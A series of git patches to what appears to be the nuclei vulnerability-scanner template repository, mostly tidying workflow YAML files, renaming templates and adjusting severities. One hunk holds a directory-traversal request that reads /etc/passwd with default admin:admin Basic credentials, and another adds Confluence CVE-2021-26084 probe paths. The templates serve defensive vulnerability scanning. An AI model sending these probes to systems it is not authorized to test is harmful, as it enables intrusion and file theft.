Thu, 9 Sep 2021 19:14:14 +0530 Subject: [PATCH 2108/4083] workflow tags cleanup as it's not supported at workflow level --- workflows/aem-workflow.yaml | 1 - workflows/airflow-workflow.yaml | 1 - workflows/artica-web-proxy-workflow.yaml | 6 ------ workflows/azkaban-workflow.yaml | 2 -- workflows/bigip-workflow.yaml | 6 ------ workflows/cacti-workflow.yaml | 2 -- workflows/cisco-asa-workflow.yaml | 6 ------ workflows/cockpit-workflow.yaml | 1 - workflows/dell-idrac-workflow.yaml | 1 - workflows/gitlab-workflow.yaml | 2 -- workflows/grafana-workflow.yaml | 2 -- workflows/harbor-workflow.yaml | 2 -- workflows/jellyfin-workflow.yaml | 1 - workflows/jira-workflow.yaml | 2 -- workflows/liferay-workflow.yaml | 5 ----- workflows/lotus-domino-workflow.yaml | 5 ----- workflows/lucee-workflow.yaml | 1 - workflows/magento-workflow.yaml | 1 - workflows/magmi-workflow.yaml | 6 ------ workflows/mida-eframework-workflow.yaml | 5 ----- workflows/netsweeper-workflow.yaml | 6 ------ workflows/phpmyadmin-workflow.yaml | 1 - workflows/rabbitmq-workflow.yaml | 5 ----- workflows/sap-netweaver-workflow.yaml | 1 - workflows/solarwinds-orion-workflow.yaml | 4 ---- workflows/springboot-workflow.yaml | 5 ----- workflows/thinkcmf-workflow.yaml | 2 -- workflows/thinkphp-workflow.yaml | 2 -- workflows/vbulletin-workflow.yaml | 6 ------ workflows/weblogic-workflow.yaml | 2 -- workflows/wordpress-workflow.yaml | 1 - 31 files changed, 93 deletions(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index ff8f7019c7..6ef96d04c9 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -4,7 +4,6 @@ info: name: Adobe Experience Manager Security Checks author: dhiyaneshDK description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/aem-detection.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 8a5a9164e8..1408a62b69 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Airflow Security Checks author: pdteam description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. - tags: workflow workflows: diff --git a/workflows/artica-web-proxy-workflow.yaml b/workflows/artica-web-proxy-workflow.yaml index 8fee7fe758..ed4ba17f87 100644 --- a/workflows/artica-web-proxy-workflow.yaml +++ b/workflows/artica-web-proxy-workflow.yaml @@ -4,14 +4,8 @@ info: name: Artica Web Proxy Security Checks author: dwisiswant0,pdteam description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/artica-web-proxy-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-17505.yaml \ No newline at end of file diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index 944c6b04b2..0fb56f4451 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -4,10 +4,8 @@ info: name: Azkaban Security Checks author: pdteam description: A simple workflow that runs all Azkaban related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/azkaban-web-client.yaml subtemplates: - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 315999a816..2e3b152ede 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -4,14 +4,8 @@ info: name: F5 BIG-IP Security Checks author: dwisiswant0 description: A simple workflow that runs all BigIP related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/bigip-config-utility-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index 8e2a673caf..7810865c26 100644 --- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -6,8 +6,6 @@ info: description: A simple workflow that runs all Cacti related nuclei templates on a given target. workflows: - - template: technologies/cacti-detect.yaml - subtemplates: - template: vulnerabilities/other/cacti-weathermap-file-write.yaml \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c..4c864a33d5 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -4,15 +4,9 @@ info: name: Cisco ASA Security Checks author: flag007 description: A simple workflow that runs all Cisco related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/cisco-asa-panel.yaml - subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml index 1771944bf3..8e3bdc14c2 100644 --- a/workflows/cockpit-workflow.yaml +++ b/workflows/cockpit-workflow.yaml @@ -4,7 +4,6 @@ info: name: Agentejo Cockpit Security Checks author: dwisiswant0 description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/cockpit-detect.yaml diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index e7385e0602..bdf4e83b20 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -3,7 +3,6 @@ info: name: Dell iDRAC Security Checks author: kophjager007 description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. - tags: workflow workflows: - template: technologies/dell/dell-idrac6-detect.yaml diff --git a/workflows/gitlab-workflow.yaml b/workflows/gitlab-workflow.yaml index c05d54cad2..ef6b650224 100644 --- a/workflows/gitlab-workflow.yaml +++ b/workflows/gitlab-workflow.yaml @@ -4,10 +4,8 @@ info: name: GitLab Security Checks author: pdteam description: A simple workflow that runs all GitLab related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/gitlab-detect.yaml subtemplates: - tags: gitlab \ No newline at end of file diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 6bff88bb5f..1a2240d48e 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -4,10 +4,8 @@ info: name: Grafana Security Checks author: pdteam description: A simple workflow that runs all Grafana related nuclei templates on a given target. - tags: workflow workflows: - template: exposed-panels/grafana-detect.yaml - subtemplates: - tags: grafana diff --git a/workflows/harbor-workflow.yaml b/workflows/harbor-workflow.yaml index d99c9482a2..49003135e7 100644 --- a/workflows/harbor-workflow.yaml +++ b/workflows/harbor-workflow.yaml @@ -4,10 +4,8 @@ info: name: Harbor Security Checks author: pikpikcu description: A simple workflow that runs all Harbor related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/harbor-detect.yaml subtemplates: - template: cves/2019/CVE-2019-16097.yaml \ No newline at end of file diff --git a/workflows/jellyfin-workflow.yaml b/workflows/jellyfin-workflow.yaml index 5023290961..126b6dbc0e 100644 --- a/workflows/jellyfin-workflow.yaml +++ b/workflows/jellyfin-workflow.yaml @@ -3,7 +3,6 @@ info: name: Jellyfin Security Checks author: dwisiswant0 description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/jellyfin-detect.yaml diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 52dc245749..28c138f0b4 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -4,10 +4,8 @@ info: name: Jira Security Checks author: micha3lb3n description: A simple workflow that runs all Jira related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/jira-detect.yaml subtemplates: - tags: jira \ No newline at end of file diff --git a/workflows/liferay-workflow.yaml b/workflows/liferay-workflow.yaml index be0612de56..822022a83a 100644 --- a/workflows/liferay-workflow.yaml +++ b/workflows/liferay-workflow.yaml @@ -4,13 +4,8 @@ info: name: Liferay Security Checks author: dwisiswant0 description: A simple workflow that runs all liferay related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/liferay-portal-detect.yaml subtemplates: - template: cves/2020/CVE-2020-7961.yaml \ No newline at end of file diff --git a/workflows/lotus-domino-workflow.yaml b/workflows/lotus-domino-workflow.yaml index 58b07e209a..826d85b7a9 100644 --- a/workflows/lotus-domino-workflow.yaml +++ b/workflows/lotus-domino-workflow.yaml @@ -4,13 +4,8 @@ info: name: Lotus Domino Security Checks author: CasperGN description: A simple workflow that runs all Lotus Domino related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: lotus-domino diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 3499322be0..1fff72dadc 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk description: A simple workflow that runs all Lucee related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/lucee-detect.yaml diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml index c7c30b1456..24e15e9433 100644 --- a/workflows/magento-workflow.yaml +++ b/workflows/magento-workflow.yaml @@ -4,7 +4,6 @@ info: name: Magento Security Checks author: TechbrunchFR description: A simple workflow that runs all Magento related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/magento-detect.yaml diff --git a/workflows/magmi-workflow.yaml b/workflows/magmi-workflow.yaml index 4e88637219..302bd59248 100644 --- a/workflows/magmi-workflow.yaml +++ b/workflows/magmi-workflow.yaml @@ -4,15 +4,9 @@ info: name: MAGMI Security Checks author: dwisiswant0 description: A simple workflow that runs all MAGMI related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/magmi-detect.yaml - subtemplates: - template: cves/2017/CVE-2017-7391.yaml - template: cves/2020/CVE-2020-5776.yaml diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index bed58d312c..ab7579cd7a 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -4,13 +4,8 @@ info: name: Mida eFramework Security Checks author: CasperGN description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: mida-eframework diff --git a/workflows/netsweeper-workflow.yaml b/workflows/netsweeper-workflow.yaml index a982fc1989..22405a1d70 100644 --- a/workflows/netsweeper-workflow.yaml +++ b/workflows/netsweeper-workflow.yaml @@ -4,14 +4,8 @@ info: name: Netsweeper Security Checks author: dwisiswant0 description: A simple workflow that runs all netsweeper related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/netsweeper-webadmin-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-13167.yaml \ No newline at end of file diff --git a/workflows/phpmyadmin-workflow.yaml b/workflows/phpmyadmin-workflow.yaml index 49f8d008d5..68ca23dc37 100644 --- a/workflows/phpmyadmin-workflow.yaml +++ b/workflows/phpmyadmin-workflow.yaml @@ -4,7 +4,6 @@ info: name: phpmyadmin-workflow author: philippedelteil description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target - tags: workflow workflows: - template: exposed-panels/phpmyadmin-panel.yaml diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 9f4f182974..c5fc2b4324 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -4,13 +4,8 @@ info: name: RabbitMQ Security Checks author: fyoorer description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index 9c61e4830c..e94191bb2d 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -4,7 +4,6 @@ info: name: SAP NetWaver Security Checks author: dwisiswant0 description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/sap-netweaver-detect.yaml # HTTP Templates diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index 3dc656fc4b..8596d03e7b 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -4,10 +4,6 @@ info: name: SolarWinds Orion Security Checks author: dwisiswant0 description: A simple workflow that runs all SolarWinds Orion related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - template: exposed-panels/solarwinds-orion.yaml diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index acaad19e2b..86abcd4af0 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -4,13 +4,8 @@ info: name: Spring Boot Security Checks author: dwisiswant0 description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/springboot-actuator.yaml subtemplates: - tags: springboot diff --git a/workflows/thinkcmf-workflow.yaml b/workflows/thinkcmf-workflow.yaml index 13462302b0..106e8a23b2 100644 --- a/workflows/thinkcmf-workflow.yaml +++ b/workflows/thinkcmf-workflow.yaml @@ -3,10 +3,8 @@ info: name: ThinkCMF Security Checks author: pdteam description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/thinkcmf-detection.yaml subtemplates: - template: vulnerabilities/thinkcmf/ \ No newline at end of file diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml index 832c163af2..f71f3195e7 100644 --- a/workflows/thinkphp-workflow.yaml +++ b/workflows/thinkphp-workflow.yaml @@ -3,10 +3,8 @@ info: name: ThinkPHP Security Checks author: dr_set description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/tech-detect.yaml matchers: - name: thinkphp diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index ddf77dc573..872d1f23ae 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -4,15 +4,9 @@ info: name: vBulletin Security Checks author: pdteam description: A simple workflow that runs all vBulletin related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml - matchers: - name: vbulletin subtemplates: diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml index 5834b6ca3e..fcca4c6bd8 100755 --- a/workflows/weblogic-workflow.yaml +++ b/workflows/weblogic-workflow.yaml @@ -3,10 +3,8 @@ info: name: WebLogic Security Checks author: dr_set description: A simple workflow that runs all WebLogic related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/weblogic-detect.yaml subtemplates: diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index e7ce984db9..e9ebc836f1 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -3,7 +3,6 @@ info: name: Wordpress Security Checks author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - tags: workflow workflows: From 1a69647ed1ff83bf049561daa213d5ec0b9154d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:35:30 -0300 Subject: [PATCH 2109/4083] Create confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 workflows/confluence-workflow.yaml diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml new file mode 100644 index 0000000000..23f3652e63 --- /dev/null +++ b/workflows/confluence-workflow.yaml @@ -0,0 +1,14 @@ +id: confluence-workflow + +info: + name: Atlassian's Confluence workflow + author: philippedelteil + description: Workflow that runs all Confluence related nuclei templates + tags: workflow + +workflows: + + - template: technologies/confluence-detect.yaml + subtemplates: + - tags: confluence + From bcc55f6a3fa4b4ab09dac94e64a2f43d33f20a2d Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:38:22 -0300 Subject: [PATCH 2110/4083] Update CVE-2021-26084.yaml Some targets worked without the ?SpaceKey=x --- cves/2021/CVE-2021-26084.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 1ef19a23c1..54134b92e1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -24,8 +24,11 @@ requests: payloads: path: - pages/createpage-entervariables.action?SpaceKey=x + - pages/createpage-entervariables.action - confluence/pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action - wiki/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action - pages/doenterpagevariables.action - pages/createpage.action?spaceKey=myproj - pages/templates2/viewpagetemplate.action From 5fe59db1ca986603cb5065d8ad032d15c6d3bec8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:17:34 +0530 Subject: [PATCH 2111/4083] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 23f3652e63..28f7500d4c 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -1,7 +1,7 @@ id: confluence-workflow info: - name: Atlassian's Confluence workflow + name: Atlassian Confluence workflow author: philippedelteil description: Workflow that runs all Confluence related nuclei templates tags: workflow @@ -11,4 +11,3 @@ workflows: - template: technologies/confluence-detect.yaml subtemplates: - tags: confluence - From 473bcb9c16c6b9d3574cd08b08db42767120c95f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:17:48 +0530 Subject: [PATCH 2112/4083] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 28f7500d4c..1830dfb187 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -3,7 +3,7 @@ id: confluence-workflow info: name: Atlassian Confluence workflow author: philippedelteil - description: Workflow that runs all Confluence related nuclei templates + description: Workflow that runs all Confluence related nuclei templates tags: workflow workflows: From 7491a628b158a96325c341aaee7517d62952f6ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:24:16 +0530 Subject: [PATCH 2113/4083] Update tomcat-detect.yaml --- technologies/tomcat-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index 5561dba63d..f78c945a3e 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,7 +1,7 @@ -id: tomcat-version +id: tomcat-detect info: - name: Detect Tomcat Version + name: Tomcat Version Detect author: philippedelteil description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info @@ -28,4 +28,4 @@ requests: name: version group: 2 regex: - - '(

    )(.*?)(

    )' \ No newline at end of file + - '(

    )(.*?)(

    )' From 9661f57b97351469917480c691f857f828624c29 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:27:34 +0530 Subject: [PATCH 2114/4083] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 1830dfb187..4636d6c85c 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -4,7 +4,6 @@ info: name: Atlassian Confluence workflow author: philippedelteil description: Workflow that runs all Confluence related nuclei templates - tags: workflow workflows: From 13ec24c2e321397a0d3e22392e4a99574fddb651 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:01:01 +0530 Subject: [PATCH 2115/4083] Update CVE-2018-15535.yaml --- cves/2018/CVE-2018-15535.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 5c53de530e..4c6646ce68 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -3,7 +3,7 @@ id: CVE-2018-15535 info: name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo - severity: high + severity: medium description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 From f01985b0a62c901d203df6f2fc89c676627cb5cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:06:54 +0530 Subject: [PATCH 2116/4083] Update karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml index d911d65f7e..8d8787781f 100644 --- a/karel-ip-phone-lfi.yaml +++ b/karel-ip-phone-lfi.yaml @@ -13,7 +13,8 @@ requests: - method: GET path: - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - + headers: + Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: From 986510dfc3f0a3fa16c69d665e28fafc337a1a4c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:13:16 +0530 Subject: [PATCH 2117/4083] Update tidb-native-cred-bruteforce.yaml --- network/tidb-native-cred-bruteforce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml index 6344da325e..a72290581b 100644 --- a/network/tidb-native-cred-bruteforce.yaml +++ b/network/tidb-native-cred-bruteforce.yaml @@ -4,8 +4,8 @@ info: name: TiDB DB with enabled native password author: lu4nx severity: info - tags: network,tidb,bruteforce,database description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. + tags: network,tidb,bruteforce,db network: - host: @@ -17,3 +17,4 @@ network: words: - "mysql_native_password" - "TiDB" + condition: and From 83bedfc6af0d8b7bd91b9f0c8b07043f1c7d4e15 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:14:04 +0530 Subject: [PATCH 2118/4083] Rename tidb-native-cred-bruteforce.yaml to tidb-native-password-bruteforce.yaml --- ...-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/{tidb-native-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} (100%) diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-password-bruteforce.yaml similarity index 100% rename from network/tidb-native-cred-bruteforce.yaml rename to network/tidb-native-password-bruteforce.yaml From 1c829f9a0575481ee919c8306f653a165c695c63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:33:41 +0530 Subject: [PATCH 2119/4083] Update ibm-security-access-manager.yaml --- exposed-panels/ibm-security-access-manager.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml index 91e521e81c..3d2e8aa816 100644 --- a/exposed-panels/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm-security-access-manager.yaml @@ -12,18 +12,17 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word words: - "IBM Security Access Manager" - "<h2>IBM Security" - "<em>Access Manager" + part: body condition: and + - type: word part: header words: - - "text/html" + - "IBM Security Access Manager for Web" From e9f728c321699cc97abcf48a6dfb33e04b059d36 Mon Sep 17 00:00:00 2001 From: Ice3man543 <nizamulrana@gmail.com> Date: Fri, 10 Sep 2021 16:56:40 +0530 Subject: [PATCH 2120/4083] Added cve annotations + severity adjustments --- cves/2011/CVE-2011-4336.yaml | 5 +++++ cves/2012/CVE-2012-4242.yaml | 1 + cves/2013/CVE-2013-2287.yaml | 1 + cves/2013/CVE-2013-3526.yaml | 1 + cves/2014/CVE-2014-2323.yaml | 5 +++++ cves/2014/CVE-2014-3744.yaml | 5 +++++ cves/2014/CVE-2014-4210.yaml | 1 + cves/2014/CVE-2014-4535.yaml | 6 ++++++ cves/2014/CVE-2014-4536.yaml | 6 ++++++ cves/2014/CVE-2014-6271.yaml | 7 ++++++- cves/2014/CVE-2014-6308.yaml | 1 + cves/2014/CVE-2014-9094.yaml | 1 + cves/2015/CVE-2015-1000012.yaml | 6 ++++++ cves/2015/CVE-2015-2080.yaml | 7 ++++++- cves/2015/CVE-2015-2807.yaml | 1 + cves/2015/CVE-2015-6544.yaml | 5 +++++ cves/2015/CVE-2015-8349.yaml | 5 +++++ cves/2015/CVE-2015-8399.yaml | 5 +++++ cves/2015/CVE-2015-8813.yaml | 5 +++++ cves/2015/CVE-2015-9414.yaml | 6 ++++++ cves/2015/CVE-2015-9480.yaml | 6 ++++++ cves/2016/CVE-2016-0957.yaml | 4 ++++ cves/2016/CVE-2016-1000126.yaml | 6 ++++++ cves/2016/CVE-2016-1000127.yaml | 5 +++++ cves/2016/CVE-2016-1000128.yaml | 5 +++++ cves/2016/CVE-2016-1000129.yaml | 5 +++++ cves/2016/CVE-2016-1000130.yaml | 5 +++++ cves/2016/CVE-2016-1000131.yaml | 6 ++++++ cves/2016/CVE-2016-1000132.yaml | 5 +++++ cves/2016/CVE-2016-1000133.yaml | 5 +++++ cves/2016/CVE-2016-1000134.yaml | 5 +++++ cves/2016/CVE-2016-1000135.yaml | 5 +++++ cves/2016/CVE-2016-1000137.yaml | 6 ++++++ cves/2016/CVE-2016-1000138.yaml | 6 ++++++ cves/2016/CVE-2016-1000139.yaml | 6 ++++++ cves/2016/CVE-2016-1000140.yaml | 6 ++++++ cves/2016/CVE-2016-1000146.yaml | 6 ++++++ cves/2016/CVE-2016-1000148.yaml | 6 ++++++ cves/2016/CVE-2016-1000149.yaml | 6 ++++++ cves/2016/CVE-2016-1000152.yaml | 5 +++++ cves/2016/CVE-2016-1000153.yaml | 6 ++++++ cves/2016/CVE-2016-1000154.yaml | 5 +++++ cves/2016/CVE-2016-1000155.yaml | 6 ++++++ cves/2016/CVE-2016-10033.yaml | 7 ++++++- cves/2016/CVE-2016-10956.yaml | 5 +++++ cves/2016/CVE-2016-10960.yaml | 7 ++++++- cves/2016/CVE-2016-10993.yaml | 6 ++++++ cves/2016/CVE-2016-2004.yaml | 5 +++++ cves/2016/CVE-2016-2389.yaml | 5 +++++ cves/2016/CVE-2016-3081.yaml | 5 +++++ cves/2016/CVE-2016-5649.yaml | 5 +++++ cves/2016/CVE-2016-6277.yaml | 7 ++++++- cves/2016/CVE-2016-7552.yaml | 5 +++++ cves/2016/CVE-2016-7981.yaml | 5 +++++ cves/2017/CVE-2017-1000028.yaml | 5 +++++ cves/2017/CVE-2017-1000170.yaml | 5 +++++ cves/2017/CVE-2017-1000486.yaml | 5 +++++ cves/2017/CVE-2017-10075.yaml | 6 +++++- cves/2017/CVE-2017-10271.yaml | 4 ++++ cves/2017/CVE-2017-11444.yaml | 7 ++++++- cves/2017/CVE-2017-12149.yaml | 5 +++++ cves/2017/CVE-2017-12542.yaml | 4 ++++ cves/2017/CVE-2017-12611.yaml | 5 +++++ cves/2017/CVE-2017-12615.yaml | 7 ++++++- cves/2017/CVE-2017-12629.yaml | 6 ++++++ 